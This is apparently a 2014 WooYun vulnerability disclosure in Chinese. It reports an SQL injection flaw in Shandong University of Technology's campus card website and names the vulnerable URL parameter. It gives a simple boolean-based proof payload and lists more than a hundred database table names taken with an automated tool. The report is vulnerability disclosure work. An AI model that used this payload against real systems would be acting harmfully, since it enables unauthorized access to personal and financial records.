当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073976

漏洞标题:山东理工的校园一卡通系统注入漏洞

相关厂商:CCERT教育网应急响应组

漏洞作者: Awe

提交时间:2014-08-27 14:24

修复时间:2014-09-01 14:26

公开时间:2014-09-01 14:26

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-27: 细节已通知厂商并且等待厂商处理中
2014-09-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

一卡通系统内某面页存在sql注入漏洞

详细说明:

http://ecard.sdut.edu.cn/Index_ShowNews.aspx?NewsCode=269 存在sql注入漏洞
随便用软件跑库
数据库名:YKTDB
ALERT_EMP_PURVIEW
ALERT_LEVEL
ALERT_LOG
ALERT_MESSAGE
ALERT_MESSAGE_HISTORY
ALERT_MODE
ALERT_SUBSCRIPTION
ALERT_TERM_EXTERNAL
ALERT_TYPE
ALERT_VOCATION
AS_BUG_LOG
AS_CONTROL
AS_GRANT
AS_LEAVE
AS_LEAVETYPE
AS_OPE_LOG
AS_OPENTIMEFIVE
AS_RECORD
AS_RECORD_HISTORY
BANALACE_REPORT_SPEC
BANALACE_SYSTEM
BANALACE_TABLE_SPEC
BASE_ABNORDEAL
BASE_ACC_FARE
BASE_ACC_GROUP
BASE_ACC_TYPE
BASE_APP_INFO
BASE_APP_TYPE
BASE_APPSERVICE_ACCREDIT
BASE_APPSERVICE_RULE
BASE_AREA
BASE_BATNUM
BASE_BUSINESS_TERM
BASE_BUSINESSMAN
BASE_CARDFUNC
BASE_CARDSF
BASE_CARDSFDETAIL
BASE_CARDTYPE
BASE_CERTIFICATETYPE
BASE_COUNTRY
BASE_CUSTOMERS
BASE_CUSTOMERS_PHONECARD
BASE_CUSTOMERS_TRANSFROM
BASE_CUSTOMERS_TRANSFROMBAD
BASE_CUSTREGISTER
BASE_DATABASE_LOG
BASE_DEPT
BASE_DEPT_MENU
BASE_DEVICE_GROUP
BASE_DEVICEGROUP_DEVICE
BASE_EMP
BASE_EMP_CARD
BASE_EMP_CARD_TYPE
BASE_EMP_MENU
BASE_EMPLOG
BASE_EMPLOGIN_LIMIT
BASE_FINGERPRINT
BASE_IMPORTDATATEMPLATE
BASE_INSERT_CUST_LOG
BASE_LOGGRANT
BASE_LOGTYPE
BASE_LQLB_PARA
BASE_MEAL
BASE_MENU
BASE_NATION
BASE_PARAM
BASE_PARAM_GROUP
BASE_PARAM_GROUP_MODEL
BASE_PARAM_GROUP_MODEL_TYPE
BASE_PARAM_LIB
BASE_PARAM_MO� EL
BASE_PARAM_TYPE
BASE_POSPRICES
BASE_REC_BAD_TYPE
BASE_RENTTYPE
BASE_REPORT
BASE_REPORT_INDEX
BASE_REPORT_LIST
BASE_ROLE
BASE_ROLE_BAK
BASE_RXFS_PARA
BASE_STATE
BASE_STATION
BASE_STATION_LOG
BASE_STATION_PORT
BASE_STATION_TYPE
BASE_SUBSYSTEM
BASE_SYSPARA
BASE_TERM
BASE_TERM_DEVICEGROUP
BASE_TERM_EXTEND
BASE_TERM_LOG
BASE_TERM_TYPE
BASE_WEBUSERLOGININFO
DATA_COL_COMMENTS
DATA_EXP_COLUMN
DATA_EXP_TEMPLATE
DATA_EXP_WHERE
DORM_ASSIGNROOM
DORM_BUILDINGINFO
DORM_PRIVILAGE
DORM_RELATION
DORM_ROOM_PRIVILEGE
DORM_ROOMINFO

漏洞证明:

http://ecard.sdut.edu.cn/Index_ShowNews.aspx?NewsCode=269%20and%201=2

修复方案:

对所有面页进行注入防护

版权声明:转载请注明来源 Awe@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-01 14:26

厂商回复:

最新状态:

暂无